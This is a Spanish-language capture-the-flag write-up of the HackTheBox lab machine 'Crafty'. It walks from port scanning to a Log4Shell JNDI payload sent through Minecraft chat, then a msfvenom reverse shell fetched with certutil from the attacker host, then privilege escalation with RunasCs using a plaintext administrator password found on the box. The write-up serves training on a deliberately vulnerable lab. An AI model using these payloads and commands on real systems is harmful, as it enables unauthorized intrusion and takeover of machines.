🌐
My Pentest Book
  • πŸ’‘I changed my website
  • πŸ“„WriteUps
    • πŸ΄β€β˜ οΈHTB - HackTheBox
      • ⬛HTB - Advanced Labs
        • Endgames
          • P.O.O.
      • 🟨HTB - Runner
      • 🟩HTB - Usage
      • 🟩HTP - Active (Incomplete)
      • 🟨HTB - Scrambled
      • πŸŸ₯HTB - FormulaX (Incomplete)
      • πŸŸ₯HTB - Office
      • 🟩HTB - Perfection
      • 🟨HTB - WifineticTwo
      • 🟨HTB - Jab (Incomplete)
      • 🟩HTB - Buff
      • 🟨HTB - Hospital
      • 🟩HTB - Crafty
      • 🟩HTB - Bizness
      • 🟩HTB - Devvortex
      • 🟩HTB - CozyHosting
      • 🟩HTB - Analytics
      • 🟩HTB - Codify
      • 🟨HTB - Surveillance
      • 🟨HTB - Monitored
Con tecnologΓ­a de GitBook
En esta pΓ‘gina
  • InformaciΓ³n General
  • Enumeration
  • Descubrimiento de directorios
  • Escaneo de Vulnerabilidades
  • ExplotaciΓ³n
  • Escalada de Privilegios
  • ConclusiΓ³n

ΒΏTe fue ΓΊtil?

Editar en GitHub
  1. WriteUps
  2. HTB - HackTheBox

HTB - Crafty

https://app.hackthebox.com/machines/Crafty

AnteriorHTB - HospitalSiguienteHTB - Bizness

ΒΏTe fue ΓΊtil?

InformaciΓ³n General

  • Nombre de la MΓ‘quina: Crafty

  • IP de la MΓ‘quina: 10.10.11.249

  • Sistema Operativo: Windows

  • Dificultad: Easy

  • Fecha de PublicaciΓ³n: 10-02-2024


Enumeration

Ping para obtener ruta de retorno

Realizamos un ping a la mΓ‘quina objetivo para verificar la conectividad y obtener informaciΓ³n sobre la ruta utilizando la opciΓ³n -R para incluir la ruta de retorno:

ping -c 1 10.10.11.249 -R

Escaneo de puertos con Nmap

Luego, realizamos un escaneo de puertos utilizando Nmap para identificar los puertos abiertos en la mΓ‘quina objetivo. Utilizamos las opciones -p- para escanear todos los puertos, --open para mostrar solo los puertos abiertos, -sS para un escaneo de tipo TCP SYN, --min-rate 5000 para establecer la velocidad mΓ­nima de paquetes y -vvv para un nivel de verbosidad alto. AdemΓ‘s, utilizamos -n para desactivar la resoluciΓ³n de DNS, -Pn para no realizar el escaneo de ping, y -oG allPorts para guardar la salida en un archivo con formato Greppable:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.249 -oG allPorts

Escaneo detallado con Nmap

Posteriormente, realizamos un escaneo mΓ‘s detallado de los puertos identificados utilizando la opciΓ³n -sCV para detecciΓ³n de versiones y scripts de enumeraciΓ³n de servicios. EspecΓ­ficamente, indicamos los puertos a escanear con -p __PORTS__ (reemplazando __PORTS__ con los puertos identificados en el paso anterior) y guardamos la salida en un archivo de texto con el nombre targeted:

sudo nmap -sCV -p80,25565 10.10.11.249 -oN targeted

Modificando /etc/hosts

Para aΓ±adir la entrada "10.10.11.249 crafty.htb" al archivo /etc/hosts, puedes usar el siguiente comando en la terminal:

echo "10.10.11.249 crafty.htb" | sudo tee -a /etc/hosts

Este comando aΓ±ade la direcciΓ³n IP 10.10.11.249 asociada al nombre de host crafty.htb al archivo /etc/hosts de tu sistema.

AnΓ‘lisis de sitio web con WhatWeb

Para obtener mΓ‘s informaciΓ³n sobre nuestro objetivo, utilizamos la herramienta WhatWeb. Esta herramienta nos permite identificar tecnologΓ­as web utilizadas en el servidor, como el sistema de gestiΓ³n de contenidos (CMS), el lenguaje de programaciΓ³n, los plugins y otras caracterΓ­sticas. Ejecutamos el siguiente comando:

Descubrimiento de directorios

En la fase de descubrimiento de directorios, se utilizan herramientas como WFuzz y Dirsearch para identificar posibles puntos de entrada o recursos ocultos en el sitio web objetivo.

El comando utilizado fue:

#Partimos con mi favorito dirsearch
dirsearch -u http://crafty.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt

#Otro wordlist que vale la pena revisar.
gobuster dir -u http://crafty.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50

Lamentablemente no pillo nada util, por lo que entro a la pagina web desde Firefox:

Agregamos la ruta play.crafty.htb pero redirecciona asi que no pillamos nada.

echo "10.10.11.249 play.crafty.htb" | sudo tee -a /etc/hosts

Escaneo de Vulnerabilidades

Ya cuando se me agotaban las ideas decidì instalar Minecraft 1.16.5, ya que curiosamente puse en Google, "Minecraft 1.16.5 exploit" y me encontré con algo interesante.

sudo java -jar TLauncher-2.895.jar

ExplotaciΓ³n

Procedemos a ejecutar el exploit, por cierto modifcamos el poc.py para que sea para windows ("cmd.exe").

sudo python3 poc.py --userip 10.10.14.17 --webport 80 --lport 6666

Mientras dejamos en escucha nuestro nc al mismo puerto que utilizamos en el exploit. Como dice en el exploit debemos enviar desde el chat de minecraft ${jndi:ldap://10.10.14.17:1389/a}

Escalada de Privilegios

Como vamos a querer descargar archivos y cosas asΓ­ no podremos desde esta shell por lo que intentaremos establecer conexiΓ³n con una shell hecha por metasploit.

Creamos nuestro reverse shell, se llamara expl.exe (por defecto)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=7777 -f exe -o expl.exe

Luego desde msfconsole configuramos el metasploit.

El ultimo paso era subir un servidor Python en el mismo directorio donde teniamos nuestro expl.exe generado por mfsvenom. Para luego descargarlo desde nuestro equipo victima.

certutil -urlcache -f http://10.10.14.17:8888/expl.exe %temp%/expl.exe

Ahora si tenemos la capacidad de poder descargar archivos, por lo que descargamos el .jar.

Para abrirlo debemos utilizar jd.gui.

Nos encontramos con unas credenciales:

s67u84zKq8IXw

Luego desde nuestra sesiΓ³n de meterpreter subimos nuestro archivo expl2.exe y RunasCs.exe a server/logs:

Por ultimo utilizamos nuestro RunasCs.exe para ejecutar el expl2.exe con las credenciales obtenidas.

.\RunasCs.exe Administrator s67u84zKq8IXw expl2.exe

ConclusiΓ³n

La verdad fue una maquina fuera de lo comΓΊn, no encontraba nada en el Enumeration, por lo que Googlee un poco y vi que realmente habΓ­a que meterse a jugar, y bueno la version del Minecraft tenΓ­a este exploit y valΓ­a la pena intentarlo y aprenderlo, buena mΓ‘quina para salir de lo cotidiano, ademΓ‘s divertido como tocΓ³ hacer la escala de privilegios, soy muy novato con Metasploit por lo que fue un desafio para mi.

Referencias

Por lo que decido instalar la version 1.16.5 en mi maquina kali con TLauncher (hay mejores formas como pyCraft pero ya demasiado tarde lo hice asΓ­ ). Investigando Log4J ()

En el README.md de , podemos ver que se necesita descargar una version en especΓ­fico de JAVA para el exploit. Por lo que la descargamos en .

Seguimos, utilizando RunasCS version 1.5. Para ello lo descargamos de , ademΓ‘s tendremos que crear otro expl2.exe con msfvenom:

AquΓ­ tenemos la flag del root

πŸ“„
πŸ΄β€β˜ οΈ
🟩
πŸŽ‰
🀣
https://github.com/kozmer/log4j-shell-poc
https://github.com/kozmer/log4j-shel
l-poc
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
https://github.com/antonioCoco/RunasCs
GitHub - antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exeGitHub
Logo
GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.GitHub
Logo